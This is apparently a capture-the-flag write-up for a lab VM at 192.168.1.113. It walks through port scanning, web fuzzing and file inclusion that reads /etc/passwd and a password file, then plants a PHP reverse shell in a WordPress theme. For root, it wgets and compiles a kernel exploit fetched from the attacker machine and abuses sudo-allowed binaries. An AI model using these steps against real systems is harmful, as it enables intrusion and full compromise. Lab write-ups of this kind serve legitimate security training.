Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 06:04 EDT
Nmap scan report for ubuntu (192.168.1.113)
Host is up (0.00013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:B5:6E:B3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds
Let's put the IP to the browser and see what we have
Nothing much. So let's use dirb to enumerate
dirb
let's navigate to dev and see what we got
Next, we use dirb but this time with a parameter X and argument .txt
We got a file called secret.txt
Inside here, it provides a link where this method is called Fuzzing
Fuzzing
wfuzz
We first need to enumerate how long is the word length
As we can see is 12 word, then we can add --hw parameter inside with 12 indicates hide all the length of 12 of words
Then we can run the command below.
We know that there is a parameter called file, from there we can go to the index.php and at the end of the URL put ?file=location.txt that the secret.txt provided for us.
Got this, secrettier360, on other php page, let's use gobuster to further enumerate.
gobuster
As we can see, we have another php file called image.php
Let's use the wfuzz again and repeat the steps above by first enumerate how many words needed
As we can see 17 words, so we put --hw argument at 17
We then got dev, let's supply it inside the URL.
Next we can replace dev to /etc/passwd
We can see that password.txt in the directory /home/saket, lets replace the /etc/passwd
We got a password that is follow_the_ippsec
Reverse Shell
We found a wordpress website
Then we go to the log in site and put username as victor and password as follow_the_ippsec
We logged into the admin panel
After wandering around, under Appearance and go to Theme Editor
On the right side, there is a php file called secret.php
Got a file that can be edited.
We can go to pentestmonkey and grab the php reverse shell file
Copy all of the content of the file to the wordpress, then change the IP and port. Update the file
Before that we need to set up a listener at our machine
Then at the URL, navigate to /wordpress/wp-content/themes/twentynineteen/secret.php
we got a shell !.
Privilege Escalation
Navigate to /home/saket and get the user flag
Method 1
Copy it to the current directory
Then, at our machine, we use python to transfer the file
At the shell, navigate to /tmp folder,
Then type wget 192.168.1.112:8000/45010.c
After that type gcc 45010.c -o exploit.
Then, chmod +x exploit
Run the exploit by typing ./exploit
type /bin/bash -i to get a proper shell
Navigate to /root and cat the root.txt and get the flag
Congratulation !
Method 2
type sudo -l and we will get this
Nagivate to /home/saket and we will see a executable enc file.
Nothing seems to be happening. After further enumeration, we found out that there is a /opt/backup/server_database and there is a backup password
Navigate back to the enc file directory and run it with sudo ./enc
We got 2 file, enc.txt and key.txt
We first change the string ippsec to the md5 hash since it tells us to do so.
By using this tool, I manage to get the plain text from the encrypted enc.txt
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,
We can see the password is tribute_to_ippsec, let's su to saket user account.
Then type sudo -l
Navigate to victor directory again and type sudo /home/victor/undefeated_victor
We found out that there is no bash for the user victor, we can type
So that we can access a shell for victor.
run again with sudo /home/victor/undefeated_victor
Got root!
navigate to /root to cat the root.txt to get the flag!
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 7 L 12 W 136 Ch "@"
000000002: 200 7 L 12 W 136 Ch "00"
000000003: 200 7 L 12 W 136 Ch "01"
000000004: 200 7 L 12 W 136 Ch "02"
000000005: 200 7 L 12 W 136 Ch "03"
000000006: 200 7 L 12 W 136 Ch "1"
000000008: 200 7 L 12 W 136 Ch "100"
000000007: 200 7 L 12 W 136 Ch "10"
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000340: 200 7 L 19 W 206 Ch "file"
Total time: 1.358470
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 698.5795
gobuster dir -u http://192.168.1.113/ -w /usr/share/wordlists/dirb/common.txt -x .php
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 6 L 17 W 197 Ch "@"
000000002: 200 6 L 17 W 197 Ch "00"
000000003: 200 6 L 17 W 197 Ch "01"
000000004: 200 6 L 17 W 197 Ch "02"
000000005: 200 6 L 17 W 197 Ch "03"
000000012: 200 6 L 17 W 197 Ch "20"
000000014: 200 6 L 17 W 197 Ch "2000"
000000006: 200 6 L 17 W 197 Ch "1"
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000256: 200 13 L 43 W 328 Ch "dev"
Total time: 1.601662
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 592.5094
